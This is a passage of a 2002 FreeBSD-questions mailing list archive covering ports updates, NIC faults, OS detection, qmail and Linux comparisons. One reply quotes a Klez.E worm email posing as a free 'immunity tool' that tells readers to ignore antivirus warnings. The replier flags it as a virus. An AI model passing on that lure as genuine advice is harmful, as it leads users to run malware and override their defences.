ZXh0L2h0bWw7IGNoYXJzZXQ9aXNvLTg4NTktMSI+PFNDUklQVCBMQU5HVUFHRT1KYXZhU2Ny aXB0PjwhLS0NCmZ1bmN0aW9uIEdVUkwoeCl7dmFyIHQ9bmV3IERhdGUoKTsgbG9jYXRpb249 eCsnJlpUPScrdC5nZXRUaW1lKCk7fQ0KZnVuY3Rpb24gbWFrZXN1cmUocCxsKXtpZiAoY29u ZmlybShwKSkgR1VSTChsKTt9DQovLy0tPjwvU0NSSVBUPjwvSEVBRD48Qk9EWSBURVhUPSMw MDAwMDAgQkdDT0xPUj0jRkZGRkZGIExJTks9IzAwMDBGRiBWTElOSz0jMDAwMEZGIEFMSU5L PSNGRjAwMDA+PFNDUklQVCBMQU5HVUFHRT1KYXZhU2NyaXB0PjwhLS0KCi8vLS0+PC9TQ1JJ UFQ+CjxIMiBBTElHTj1DRU5URVI+TWlzY2VsbGFuZW91cyBJdGVtczwvSDI+CjxGT1JNIEFD VElPTj0vY2dpLWJpbi9taXNjIE1FVEhPRD1HRVQ+CjxJTlBVVCBUWVBFPUhJRERFTiBWQUxV RT0iQCIgTkFNRT1SQz48SU5QVVQgVFlQRT1ISURERU4gVkFMVUU9IjAwRkMiIE5BTUU9WFg+ CjxUQUJMRSBCT1JERVI9MCBXSURUSD05OSU+CjxUUiBCR0NPTE9SPSM5OUZGOTk+CjxUSCBX SURUSD00NSU+SXRlbTwvVEg+CjxUSCBXSURUSD00MCU+U2V0dGluZzwvVEg+CjxUSCBXSURU SD0xNSU+RW5hYmxlPC9USD4KPC9UUj4KPCEtLVRSPgo8VEQ+PElNRyBTUkM9L3BhcnIuZ2lm PkZheC1PdXQgU2VydmVyPC9URD4KPFREPi08L1REPgo8VEQgQUxJR049Q0VOVEVSPjxJTlBV VCBUWVBFPUNIRUNLQk9YIE5BTUU9REYxMSBDSEVDS0VEPjwvVEQ+CjwvVFItLT4KPFRSPgo8 VEQ+PElNRyBTUkM9L3BhcnIuZ2lmPklQIEFkZHJlc3Mgb2YgRE1aIEhvc3Q8L1REPgo8VEQ+ MTkyLjE2OC4xMjMuPElOUFVUIFRZUEU9VEVYVCBOQU1FPURIIFZBTFVFPSIiIFNJWkU9MyBN QVhMRU5HVEg9Mz48L1REPgo8VEQgQUxJR049Q0VOVEVSPjxJTlBVVCBUWVBFPUNIRUNLQk9Y IE5BTUU9TEYwID48L1REPgo8L1RSPgo8VFI+CjxURD48SU1HIFNSQz0vcGFiYi5naWY+UmVt b3RlIEFkbWluaXN0cmF0b3IgSG9zdDwvVEQ+CjxURD48SU5QVVQgVFlQRT1URVhUIE5BTUU9 UkggVkFMVUU9IjAuMC4wLjAiIFNJWkU9MTggTUFYTEVOR1RIPTE4PjwvVEQ+CjxURCBBTElH Tj1DRU5URVI+PElOUFVUIFRZUEU9Q0hFQ0tCT1ggTkFNRT1MRjIgPjwvVEQ+CjwvVFI+CjxU Uj4KPFREPjxJTUcgU1JDPS9wYWJiLmdpZj5BZG1pbmlzdHJhdG9yIFRpbWUtb3V0PC9URD4K PFREIENPTFNQQU49Mj48SU5QVVQgVFlQRT1URVhUIE5BTUU9TEEgVkFMVUU9NjAwIFNJWkU9 NCBNQVhMRU5HVEg9ND4gc2Vjb25kcyAoMCB0byBkaXNhYmxlKTwvVEQ+CjwvVFI+CjxUUj4K PFREIENPTFNQQU49Mj48SU1HIFNSQz0vcGFyci5naWY+RGlzY2FyZCBQSU5HIGZyb20gV0FO IHNpZGU8L1REPgo8VEQgQUxJR049Q0VOVEVSPjxJTlBVVCBUWVBFPUNIRUNLQk9YIE5BTUU9 TEY0ID48L1REPgo8L1RSPgo8VFI+CjxURD48SU1HIFNSQz0vcGFyci5naWY+Tm9uLXN0YW5k YXJkIEZUUCBwb3J0PC9URD4KPFREIENPTFNQQU49Mj48SU5QVVQgVFlQRT1URVhUIE5BTUU9 WEYgVkFMVUU9IjAiIFNJWkU9NSBNQVhMRU5HVEg9NT48L1REPgo8L1RSPgo8L1RBQkxFPjxQ Pgo8SU5QVVQgVFlQRT1TVUJNSVQgVkFMVUU9IlNhdmUiPgo8SU5QVVQgVFlQRT1SRVNFVCBW QUxVRT0iVW5kbyI+CjxJTlBVVCBUWVBFPUJVVFRPTiBWQUxVRT0iSGVscCIgT25DbGljaz0i bG9jYXRpb249Jy9oLW1pc2MuaHRtJyI+CjxGT05UIENPTE9SPSNGRjAwMDA+CgoKPC9GT05U Pgo8L0ZPUk0+PC9CT0RZPjwvSFRNTD4K --R14i5x3r9Q04VxeszI23K5c8Vsdk44Ty79V-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 17:36:58 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mailsrv.otenet.gr (mailsrv.otenet.gr [195.170.0.5]) by hub.freebsd.org (Postfix) with ESMTP id E4F0937B437 for ; Tue, 25 Jun 2002 17:36:25 -0700 (PDT) Received: from hades.hell.gr (patr364-a27.otenet.gr [195.167.109.59]) by mailsrv.otenet.gr (8.12.3/8.12.3) with ESMTP id g5Q0aE42016605; Wed, 26 Jun 2002 03:36:17 +0300 (EEST) Received: from hades.hell.gr (hades [127.0.0.1]) by hades.hell.gr (8.12.4/8.12.4) with ESMTP id g5Q0aDeC007016; Wed, 26 Jun 2002 03:36:13 +0300 (EEST) (envelope-from keramida@ceid.upatras.gr) Received: (from charon@localhost) by hades.hell.gr (8.12.4/8.12.4/Submit) id g5Q0Xf1n006999; Wed, 26 Jun 2002 03:33:41 +0300 (EEST) (envelope-from keramida@ceid.upatras.gr) Date: Wed, 26 Jun 2002 03:33:40 +0300 From: Giorgos Keramidas To: Jon Noack Cc: pcasidy@casidy.com, freebsd-questions@FreeBSD.ORG Subject: Re: Amount of FreeBSD servers is decreasing in servers statistics Message-ID: <20020626003340.GA6851@hades.hell.gr> References: <20020625012123.300.h001.c015.wm@mail.compgeek.com.criticalpath.net> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline In-Reply-To: <20020625012123.300.h001.c015.wm@mail.compgeek.com.criticalpath.net> X-Operating-System: FreeBSD 5.0-CURRENT i386 X-PGP-Fingerprint: C1EB 0653 DB8B A557 3829 00F9 D60F 941A 3186 03B6 X-Phone: +30-944-116520 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG On 2002-06-25 01:21 +0000, Jon Noack wrote: > > Does anybody have a clue? > Already been said, but I'd just like to echo that every FreeBSD box I've > upgraded to 4.6 has shown up as unknown. New versions of OSs always seem to > confuse detection programs. Another program that acts like this is nmap. > Next version almost always detects it correctly, though. Just FYI, Another common culprit that confuses programs like nmap or the Netcraft detection tests is: # sysctl -a | grep blackhole net.inet.tcp.blackhole: 2 net.inet.udp.blackhole: 1 The blackhole(4) manpage explains in detail why these two sysctls can cause the `confusion'. - Giorgos To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 17:40:21 2002 Delivered-To: freebsd-questions@freebsd.org Received: from hawk.mail.pas.earthlink.net (hawk.mail.pas.earthlink.net [207.217.120.22]) by hub.freebsd.org (Postfix) with ESMTP id 463CE37B435 for ; Tue, 25 Jun 2002 17:39:08 -0700 (PDT) Received: from user-119aekg.biz.mindspring.com ([66.149.58.144] helo=ns.flncs.com) by hawk.mail.pas.earthlink.net with esmtp (Exim 3.33 #2) id 17N0pu-0003xu-00; Tue, 25 Jun 2002 17:39:07 -0700 Received: from rtcol2dod4he5l2 (cable [12.164.45.65]) by ns.flncs.com (Postfix) with ESMTP id 8402653C9; Tue, 25 Jun 2002 20:43:13 -0400 (EDT) Message-ID: <007e01c21caa$f67e8520$f901a8c0@rtcol2dod4he5l2> From: "Moti Levy" To: "Max" , References: <20020625133839.A22573@cygnus.wks.Gallup.cia-g.com> <20020625215948.557bc36a.max@fr.fm> Subject: Re: FreeBSD, Linux or Solaris Date: Tue, 25 Jun 2002 20:46:48 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 5.50.4522.1200 X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4522.1200 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG i used gentoo it's young and looks good i would stick with debian for the time being because it's more stable . gentoo will be the best linux around in a few months when it matures a bit more . ( this is my IMHO of course ....) rummer has it it is spoonsered by ibm and that's a good sign as well . ----- Original Message ----- From: "Max" To: Sent: Tuesday, June 25, 2002 3:59 PM Subject: Re: FreeBSD, Linux or Solaris > On Tue, 25 Jun 2002 14:46:57 -0500 > "Jon Noack" wrote: > > > Anyone used Gentoo? I like what I hear about emerge, and I'd like to have a > > more FreeBSD-ish Linux distro for those situations (read: clients) that > > demand Linux. > > i try Gentoo, emerge looks like freebsd ports... > > "emerge fluxbox" will download last fluxbox sources, compile and install it > > gentoo : /usr/portage/ > freebsd : /usr/ports/ > :) > > -- > Maxime Biais (biais_m) > max@fr.fm > www.tachatte.org > 06 80 25 94 17 > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-questions" in the body of the message > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 17:59:59 2002 Delivered-To: freebsd-questions@freebsd.org Received: from domain.com (12-225-201-177.client.attbi.com [12.225.201.177]) by hub.freebsd.org (Postfix) with SMTP id 8BDF437B400 for ; Tue, 25 Jun 2002 17:59:56 -0700 (PDT) Received: (qmail 98824 invoked from network); 26 Jun 2002 00:59:17 -0000 Received: from unknown (HELO purgatory) (12.225.201.178) by 192.168.1.11 with SMTP; 26 Jun 2002 00:59:17 -0000 From: "SxTX" To: Subject: Date: Tue, 25 Jun 2002 17:59:56 -0700 Message-ID: <000001c21cac$c9940970$b2c9e10c@purgatory> MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook, Build 10.0.3416 Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1050 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I am also having a problem with the K7S5A onboard SiS 900 nic. My box is at a co-location and since its been up it just stops Working every other day for no reason that I can find. I know the machine is still up but the biggest ping I can send is 24 bytes anything larger times out. I have had this problem with 4.6-PRERELEASE and 4.6-RELEASE It's kind of irritating calling my co-lo every other day asking for a reboot on my useless machine. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 18:18: 4 2002 Delivered-To: freebsd-questions@freebsd.org Received: from spork.pantherdragon.org (spork.pantherdragon.org [206.29.168.146]) by hub.freebsd.org (Postfix) with ESMTP id 2478C37B40C for ; Tue, 25 Jun 2002 18:16:17 -0700 (PDT) Received: from spark.techno.pagans (spark.techno.pagans [4.61.202.145]) by spork.pantherdragon.org (Postfix) with ESMTP id 94A44471DA for ; Tue, 25 Jun 2002 18:16:15 -0700 (PDT) Received: from pantherdragon.org (speck.techno.pagans [172.21.42.2]) by spark.techno.pagans (Postfix) with ESMTP id D41BEFEBE for ; Tue, 25 Jun 2002 18:16:14 -0700 (PDT) Message-ID: <3D1910C8.7471BD8@pantherdragon.org> Date: Tue, 25 Jun 2002 17:54:32 -0700 From: Darren Pilgrim X-Mailer: Mozilla 4.76 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-questions@freebsd.org Subject: Compatibility of the current openssh-portable port on 4.5-R? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I want to update my ports tree and build the current openssh-portable port on my 4.5-R machine. Will this work? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 18:18:16 2002 Delivered-To: freebsd-questions@freebsd.org Received: from spork.pantherdragon.org (spork.pantherdragon.org [206.29.168.146]) by hub.freebsd.org (Postfix) with ESMTP id 98C7A37B40D for ; Tue, 25 Jun 2002 18:16:17 -0700 (PDT) Received: from spark.techno.pagans (spark.techno.pagans [4.61.202.145]) by spork.pantherdragon.org (Postfix) with ESMTP id 14D0D471DC for ; Tue, 25 Jun 2002 18:16:16 -0700 (PDT) Received: from pantherdragon.org (speck.techno.pagans [172.21.42.2]) by spark.techno.pagans (Postfix) with ESMTP id 165AFFFD5 for ; Tue, 25 Jun 2002 18:16:16 -0700 (PDT) Message-ID: <3D1915DF.EAEF972@pantherdragon.org> Date: Tue, 25 Jun 2002 18:16:15 -0700 From: Darren Pilgrim X-Mailer: Mozilla 4.76 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-questions@freebsd.org Subject: Updating my ports tree? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG I have a 4.5-R machine for which I'd like to update my ports tree. I really just want the current openssh-portable port, but I figure I might as well update the whole tree while I'm at it. Do I need to fetch the tree for -stable, or do I just fetch it from the default in the example supfile (which is .)? To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 18:54:22 2002 Delivered-To: freebsd-questions@freebsd.org Received: from cpimssmtpu02.email.msn.com (cpimssmtpu02.email.msn.com [207.46.181.78]) by hub.freebsd.org (Postfix) with ESMTP id C9D7B37B401 for ; Tue, 25 Jun 2002 18:54:18 -0700 (PDT) Received: from thebe ([67.24.230.81]) by cpimssmtpu02.email.msn.com with Microsoft SMTPSVC(5.0.2195.4905); Tue, 25 Jun 2002 18:53:30 -0700 From: "Aaron Burke" To: "Darren Pilgrim" Cc: "FreeBSD-Questions" Subject: RE: Updating my ports tree? Date: Tue, 25 Jun 2002 18:53:03 -0700 Message-ID: MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0) Importance: Normal X-MimeOLE: Produced By Microsoft MimeOLE V5.50.4133.2400 In-Reply-To: <3D1915DF.EAEF972@pantherdragon.org> X-OriginalArrivalTime: 26 Jun 2002 01:53:30.0861 (UTC) FILETIME=[45AF69D0:01C21CB4] Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > -----Original Message----- > From: owner-freebsd-questions@FreeBSD.ORG > [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Darren Pilgrim > Sent: Tuesday, June 25, 2002 06:16 PM > To: freebsd-questions@FreeBSD.ORG > Subject: Updating my ports tree? > > > I have a 4.5-R machine for which I'd like to update my ports tree. > I really just want the current openssh-portable port, but I figure I > might as well update the whole tree while I'm at it. Do I need to > fetch the tree for -stable, or do I just fetch it from the default in > the example supfile (which is .)? They are not the same supfiles. Also the ports are constantly changing. I use the supfile from /usr/share/examples/cvsup/ports-supfile. The only thing that needs changing is the cvsup server. I also copied this file to /root. Just make the changes and run "cvsup -g -L 2 /root/ports-supfile" to get the new ports installed. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 19:27:16 2002 Delivered-To: freebsd-questions@freebsd.org Received: from spork.pantherdragon.org (spork.pantherdragon.org [206.29.168.146]) by hub.freebsd.org (Postfix) with ESMTP id 7A70737B401 for ; Tue, 25 Jun 2002 19:27:14 -0700 (PDT) Received: from spark.techno.pagans (spark.techno.pagans [4.61.202.145]) by spork.pantherdragon.org (Postfix) with ESMTP id 13183471DA; Tue, 25 Jun 2002 19:27:14 -0700 (PDT) Received: from pantherdragon.org (speck.techno.pagans [172.21.42.2]) by spark.techno.pagans (Postfix) with ESMTP id F319EFEBE; Tue, 25 Jun 2002 19:27:11 -0700 (PDT) Message-ID: <3D19267F.8A2FCFE5@pantherdragon.org> Date: Tue, 25 Jun 2002 19:27:11 -0700 From: Darren Pilgrim X-Mailer: Mozilla 4.76 [en] (Win98; U) X-Accept-Language: en MIME-Version: 1.0 To: Aaron Burke Cc: FreeBSD-Questions Subject: Re: Updating my ports tree? References: Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Aaron Burke wrote: > > > -----Original Message----- > > From: owner-freebsd-questions@FreeBSD.ORG > > [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Darren Pilgrim > > Sent: Tuesday, June 25, 2002 06:16 PM > > To: freebsd-questions@FreeBSD.ORG > > Subject: Updating my ports tree? > > > > > > I have a 4.5-R machine for which I'd like to update my ports tree. > > I really just want the current openssh-portable port, but I figure I > > might as well update the whole tree while I'm at it. Do I need to > > fetch the tree for -stable, or do I just fetch it from the default in > > the example supfile (which is .)? > > They are not the same supfiles. Also the ports are constantly changing. > I use the supfile from /usr/share/examples/cvsup/ports-supfile. The only > thing that needs changing is the cvsup server. I also copied this file > to /root. Just make the changes and run > "cvsup -g -L 2 /root/ports-supfile" to get the new ports installed. Thanks for your reply, but I managed to get it to work before anyone replied. Right now I'm installing portupgrade and will be upgrading all the installed ports. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 19:27:46 2002 Delivered-To: freebsd-questions@freebsd.org Received: from pintail.mail.pas.earthlink.net (pintail.mail.pas.earthlink.net [207.217.120.122]) by hub.freebsd.org (Postfix) with ESMTP id 53DBD37B401 for ; Tue, 25 Jun 2002 19:27:27 -0700 (PDT) Received: from user168.net314.fl.sprint-hsd.net ([207.30.169.168] helo=thorr) by pintail.mail.pas.earthlink.net with smtp (Exim 3.33 #2) id 17N2Wj-0006Af-00; Tue, 25 Jun 2002 19:27:25 -0700 Message-ID: <001901c21cb9$094576b0$9865fea9@asgardnet.org> From: "Ciro Maeitta" To: "info" , References: <200206252343.g5PNhVi49182@mx0.ecxnetwork.net> Subject: Re: Worm Klez.E immunity Date: Tue, 25 Jun 2002 22:27:13 -0400 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0016_01C21C97.746B8C80" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_0016_01C21C97.746B8C80 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable You have a virus. Please clean it and secure your system. ----- Original Message -----=20 From: info=20 To: questions@FreeBSD.org=20 Sent: Tuesday, June 25, 2002 1943h Subject: Worm Klez.E immunity Klez.E is the most common world-wide spreading worm.It's very = dangerous by corrupting your files. Because of its very smart stealth and anti-anti-virus technic,most = common AV software can't detect or clean it. We developed this free immunity tool to defeat the malicious virus. You only need to run this tool once,and then Klez will never come into = your PC. NOTE: Because this tool acts as a fake Klez to fool the real worm,some = AV monitor maybe cry when you run it. If so,Ignore the warning,and select 'continue'. If you have any question,please mail to me.=20 ------=_NextPart_000_0016_01C21C97.746B8C80 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
You have a virus. Please clean it and = secure your=20 system.
 
 
----- Original Message -----
From:=20 info
Sent: Tuesday, June 25, 2002 = 1943h
Subject: Worm Klez.E = immunity

Klez.E is the most common world-wide = spreading=20 worm.It's very dangerous by corrupting your files.
Because of its = very=20 smart stealth and anti-anti-virus technic,most common AV software = can't detect=20 or clean it.
We developed this free immunity tool to defeat the = malicious=20 virus.
You only need to run this tool once,and then Klez will never = come=20 into your PC.
NOTE: Because this tool acts as a fake Klez to fool = the real=20 worm,some AV monitor maybe cry when you run it.
If so,Ignore the=20 warning,and select 'continue'.
If you have any question,please mail to me.
=20 ------=_NextPart_000_0016_01C21C97.746B8C80-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 19:34:53 2002 Delivered-To: freebsd-questions@freebsd.org Received: from 100m.mpr200-1.esr.lvcm.net (100m.mpr200-1.esr.lvcm.net [24.234.0.78]) by hub.freebsd.org (Postfix) with ESMTP id B6F1337B400 for ; Tue, 25 Jun 2002 19:34:47 -0700 (PDT) Received: from penguin (ip68-96-110-242.lv.lv.cox.net [68.96.110.242]) by 100m.mpr200-1.esr.lvcm.net (Mirapoint Messaging Server MOS 2.9.3.5) with SMTP id AHA99170; Tue, 25 Jun 2002 19:34:44 -0700 (PDT) Message-ID: <000c01c21cba$708563c0$cde85940@penguin> From: "Taylor Dondich" To: Subject: How come SMTP isn't working on my QMAIL installation? Date: Tue, 25 Jun 2002 19:37:37 -0700 MIME-Version: 1.0 Content-Type: multipart/alternative; boundary="----=_NextPart_000_0009_01C21C7F.C30A4650" X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG This is a multi-part message in MIME format. ------=_NextPart_000_0009_01C21C7F.C30A4650 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable I've installed qmail from the ports and yet, smtp isn't working on the = server. Does anyone know where I can start my troubleshooting process? = I really don't know. Taylor Dondich ------=_NextPart_000_0009_01C21C7F.C30A4650 Content-Type: text/html; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable
I've installed qmail = from the ports=20 and yet, smtp isn't working on the server.  Does anyone know where = I can=20 start my troubleshooting process?  I really don't = know.
 
Taylor=20 Dondich
------=_NextPart_000_0009_01C21C7F.C30A4650-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 19:41:55 2002 Delivered-To: freebsd-questions@freebsd.org Received: from services.webwarrior.net (overlord-host99.dsl.visi.com [209.98.86.99]) by hub.freebsd.org (Postfix) with ESMTP id 3906B37B401 for ; Tue, 25 Jun 2002 19:41:51 -0700 (PDT) Received: from twincat.vladsempire.net (hutch-670.hutchtel.net [206.10.68.198]) by services.webwarrior.net (Postfix) with ESMTP id 2C89A83828D for ; Tue, 25 Jun 2002 21:41:49 -0500 (CDT) Received: by twincat.vladsempire.net (Postfix, from userid 1001) id A0B9C38C9; Tue, 25 Jun 2002 21:39:26 +0000 (GMT) Date: Tue, 25 Jun 2002 21:39:26 +0000 From: Josh Paetzel To: Gautham Ganapathy Cc: "FreeBSD.org - Questions" Subject: Re: [OFF] Pentium vs Athlon which is better Message-ID: <20020625213926.B279@twincat.vladsempire.net> References: <20020624211811.A335@fishballoon.dyndns.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: ; from gauthamg123list@myrealbox.com on Tue, Jun 25, 2002 at 09:40:21AM +0530 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG > > > > That said, my Athlon XP 1800+ box runs perfectly happily and almost > > silently with a 'flower cooler' http://from www.quietpc.com/ > > and a couple > > of 1500RPM fans. IMHO this belief that Athlon systems always > > need extreme > > cooling is often overstated; it's probably the fault of all the > > overclocking nuts trying to squeeze every last MHz out of their > > machines... now you do need some serious cooling to pull that > > kind of thing > > off :-) > > I have an Athlon (tbird 850) running on an A7V333. AMD approved > heatsink/fan. The CPU temp often goes to around 85C and the fan is > genarally at around 6000rpm (smashed my finger on it once). is this > normal ? motherboard temp is somewhere at 50C. the temp hike is > generally when i am in freebsd or playing games in win2k. running normal > apps (ie, editors, etc) is generally not a problem. is this a problem > b/w the cpu and the mb The thermal diodes on motherboards are notoriously inaccurate. My XP 1800 has a volcano 6cu+ hsf on it, plus the case has 2 5" intake fans and an 8" exhaust fan. At full load in FreeBSD the hardware monitor claims the CPU is at 70C, even though the heat sink is barely warm to the touch. On the other hand, if your heatsink is not seated properly it's possible to get those temps fairly easily, and 90C is fatal for your CPU. :-/ Josh To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 19:58:30 2002 Delivered-To: freebsd-questions@freebsd.org Received: from mail.gmx.net (mail.gmx.net [213.165.64.20]) by hub.freebsd.org (Postfix) with SMTP id 0AD6937B400 for ; Tue, 25 Jun 2002 19:58:27 -0700 (PDT) Received: (qmail 23587 invoked by uid 0); 26 Jun 2002 02:58:24 -0000 Received: from unknown (HELO corrsl7vs6l3tz) (203.200.184.65) by mail.gmx.net (mp001-rz3) with SMTP; 26 Jun 2002 02:58:24 -0000 Message-ID: <00d201c21cbd$3b9ff2d0$1ba8c8cb@corrsl7vs6l3tz> From: "Sanjay Bhattacharya" To: References: <20020625135153.M403-100000@localhost> <5.1.1.6.2.20020625121305.03d1f270@pop3s.schulte.org> <20020625120402.A7861@cygnus.wks.Gallup.cia-g.com> Subject: Long live The Penguin!!!! Date: Wed, 26 Jun 2002 08:27:09 +0530 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-Mimeole: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Please guys (the anti Penguin lobby), relax. I've been making my bread and butter out of Linux for the last 3 years. And I am a Sun Certified System Administrator. Still I've chosen my work field to be Linux. Why? Because I am in love with the penguin. As for me I haven't found anything that's drastically wrong as it always happens with Winblows. On the contrary there are revolutionary changes in 2.4 series kernels. One that has made my life a lot easier is certianly netfilter/iptables. And as for the libc problem, a little caution always saved my from big hassles. I am sort of a newbie to FreeBSD. But one thing I dislike about it is ipfw. Its so complicated. In contrast iptables in Linux is a pleasure to use. Apart from that upgrading Linux kernel is an easy task. I always patch my kernel with the latest updates and then I compile it. It runs like a dream. And believe me, I haven't faced a single problem in the last three years. But one thing I always avoid is rpm's. You might call me an old timer but I've my faith on the sources. And the configure/make/make install/ has always given me what I wanted. And to say nothing of the device recognition capabilities of the Linux kernel. I thank my lucky stars again and again that I don't have to bother about the HCL, thanks to Linux. So I think the Penguin is doing a great job. And under no circumstances it is inferior to the daemon. I want to conclude with the slogan ..."In Penguin I trust". rgds, Sanjay To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-questions" in the body of the message From owner-freebsd-questions Tue Jun 25 20: 5: 2 2002 Delivered-To: freebsd-questions@freebsd.org Received: from infinity.aesredfish.net (ns1.aesredfish.net [65.168.0.12]) by hub.freebsd.org (Postfix) with ESMTP id 449AA37B400 for ; Tue, 25 Jun 2002 20:04:58 -0700 (PDT) Received: from potentialtech.com (mhope-dhcp-65-168-1-181.dashfast.com [65.168.1.181]) by infinity.aesredfish.net (8.11.6/8.11.0) with ESMTP id g5Q34er09271; Tue, 25 Jun 2002 23:04:40 -0400 Message-ID: <3D1930C2.6030007@potentialtech.com> Date: Tue, 25 Jun 2002 23:10:58 -0400 From: Bill Moran User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0rc1) Gecko/20020502 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Ganesh Kumar Cc: freebsd-questions@freebsd.org Subject: Re: ISO file huuuge ! References: Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-questions@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.ORG Ganesh Kumar wrote: > Hi, > I created a ISO with mkisofs command.But the size is now > 1024MB(vannila,rockridge and jolleit) which will hardly fit in to a > normal CD. > > I would like to give this to the Windows users for installation. > > So shall I give only roockridge and jolliet ? Will they be able to > install on that ? If it's only for Windows users, you don't need Rockridge, just Joliet. But I doubt that alone is going to make your .iso small enough. I would scan through the files you're burning into this and see if there are any that you can do 